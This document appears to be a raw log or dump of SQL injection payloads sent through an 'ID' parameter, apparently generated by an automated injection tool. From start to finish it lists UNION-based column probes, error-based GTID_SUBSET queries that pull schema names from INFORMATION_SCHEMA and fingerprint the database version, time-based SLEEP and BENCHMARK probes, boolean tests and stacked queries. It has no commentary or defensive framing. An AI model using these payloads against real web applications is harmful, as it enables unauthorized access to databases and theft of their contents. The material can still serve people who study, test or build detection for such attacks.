ID:-3351' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-3767' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-6504' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-5795' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-4711' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2849' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-8451' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-9124' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-8063' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-5064' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-6156' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2916' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-5434' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-6133' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2965' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-6180' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-3136' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-8752' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-5575' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-3046' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-7970' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-4900' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-5045' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-8596' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2139' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-8372' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-3602' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2038' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-5098' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-9441' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-5620' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-6016' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-1064' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2819' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-7449' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2267' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-6686' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-6651' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-6739' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-7293' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-5429' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-3691' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-5230' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-7766' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-7470' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-8541' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-4291' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-4301' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-9846' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-1220' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2653' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-1924' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2045' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-1024' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-4094' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-8117' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-4407' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-7187' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-8440' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-9415' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-1479' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-6939' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-7451' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-4225' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2507' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2439' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2043' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-8200' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-3817' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-4760' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-7534' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-5581' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-4501' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT (CASE WHEN (3860=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3860) THEN 1 ELSE 0 END)),0x716a6b6a71),2698) AND 'vwyI'='vwyI
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT REPEAT(0x34,1024)),0x716a6b6a71),6672) AND 'RuJX'='RuJX
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT REPEAT(0x30,190)),0x716a6b6a71),6973) AND 'zdNa'='zdNa
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT (CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END)),0x716a6b6a71),6044) AND 'cZiZ'='cZiZ
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT (CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END)),0x716a6b6a71),8141) AND 'lAEv'='lAEv
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END)),0x716a6b6a71),2773) AND 'TLVU'='TLVU
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END)),0x716a6b6a71),7367) AND 'vrib'='vrib
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT (CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END)),0x716a6b6a71),3020) AND 'Jaau'='Jaau
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x716a6b6a71),4161) AND 'bEnz'='bEnz
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x716a6b6a71),5875) AND 'UqGP'='UqGP
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x716a6b6a71),9002) AND 'HlgD'='HlgD
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),0x716a6b6a71),1574) AND 'xRUo'='xRUo
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),0x716a6b6a71),1009) AND 'ONUo'='ONUo
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),0x716a6b6a71),8752) AND 'JSKa'='JSKa
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),0x716a6b6a71),5939) AND 'GInA'='GInA
ID:1' and if(length(database())=8,sleep(5),1)-- 
ID:1
ID:
ID:78b3116a0f"
ID:fdee373ed52f)
ID:d978528e'
ID:
ID:0f6d1f800e9d'
ID:2bc7e7e47f35e983"
ID:026600c2a196)
ID:
ID:98d14ab837f432)
ID:1fdad58ef3ad'
ID:0f4de6c90be840"
ID:
ID:1f73af357069fc"
ID:a23e5b3370d99c'
ID:87d50e5839)
ID:
ID:6b2555d6018fe7"
ID:e3344f70'
ID:21930eff63be2b)
ID:
ID:946a769b5047)
ID:722682ed"
ID:ce22390e'
ID:
ID:b2d4c4996ed7ad'
ID:a56dbe81"
ID:043c919b086263)
ID:1
ID:1
ID:1
ID:7681
ID:1)'".),,)(.
ID:1'naWcep<'">HVMAVy
ID:1) AND 5072=1312 AND (4315=4315
ID:1) AND 5421=5421 AND (6354=6354
ID:1 AND 7405=8154
ID:1 AND 5421=5421
ID:1 AND 2525=4970-- zdyH
ID:1 AND 5421=5421-- IJES
ID:1') AND 2658=1968 AND ('BrQm'='BrQm
ID:1') AND 5421=5421 AND ('KpNc'='KpNc
ID:1' AND 5104=8707 AND 'nIvF'='nIvF
ID:1' AND 5421=5421 AND 'uDuM'='uDuM
ID:1' AND 7778=3730 AND 'HgAm'='HgAm
ID:(SELECT CONCAT(CONCAT(0x716b717671,(CASE WHEN (7532=7532) THEN 0x31 ELSE 0x30 END)),0x7162717871))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b717671,(SELECT (ELT(7173=7173,1))),0x7162717871,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'VpvD'='VpvD
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b717671,(SELECT (ELT(8276=8276,1))),0x7162717871,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'yVJU'='yVJU
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x716b717671,(SELECT (ELT(6511=6511,1))),0x7162717871,0x78))x)) AND 'uyPn'='uyPn
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x716b717671,(SELECT (ELT(3674=3674,1))),0x7162717871,0x78))x)) AND 'WvBs'='WvBs
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT (ELT(8994=8994,1))),0x7162717871),8994) AND 'xPJu'='xPJu
ID:(SELECT CONCAT(0x716b717671,(ELT(7928=7928,1)),0x7162717871))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'WjpP'='WjpP
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))zwUg)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))eoJQ) AND 'yMdf'='yMdf
ID:1';SELECT BENCHMARK(5000000,MD5(0x77637873))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x4b466753)) AND 'VXuh'='VXuh
ID:1' AND (SELECT 9490 FROM (SELECT(SLEEP(5)))TJcF) AND 'UqTE'='UqTE
ID:1' AND (SELECT 9490 FROM (SELECT(SLEEP(0)))TJcF) AND 'UqTE'='UqTE
ID:1' AND (SELECT 9490 FROM (SELECT(SLEEP(5)))TJcF) AND 'UqTE'='UqTE
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 9752-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b717671,0x59664e62596a684f54466f77436e65564e774d627946556d517576626f787a6a5477536c6b4d504b,0x7162717871)-- -
ID:1' UNION ALL SELECT CONCAT(0x716b717671,0x57546a6e657a707272766572665a5a6a4a647451416479676f4a5155497451654964584778587478,0x7162717871),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x716b717671,0x4a5565414e53704b4464674c4b5667625653535952577a454242705478514f6c6d494d74724b6258,0x7162717871),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b717671,0x6e76456e6a4f41584a54,0x7162717871)-- -
ID:1' UNION ALL SELECT CONCAT(0x716b717671,0x7445684a50464c6b497a,0x7162717871),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x716b717671,0x455768556f7a69735258,0x7162717871),NULL-- -
ID:-4467' UNION ALL SELECT NULL,NULL,CONCAT(0x716b717671,0x774945706f7046716f6175444e45434648766d667a4c73587348545a4a71546f725a557653527674,0x7162717871)-- -
ID:-9155' UNION ALL SELECT NULL,CONCAT(0x716b717671,0x6b5273786a4e6f5269676a6956624d754e75724a74736b787473736354646b41435459457a425456,0x7162717871),NULL-- -
ID:-5971' UNION ALL SELECT CONCAT(0x716b717671,0x794d50746b514d4852454462436e74466275576961566b45537967596b76537a6c48504e48697057,0x7162717871),NULL,NULL-- -
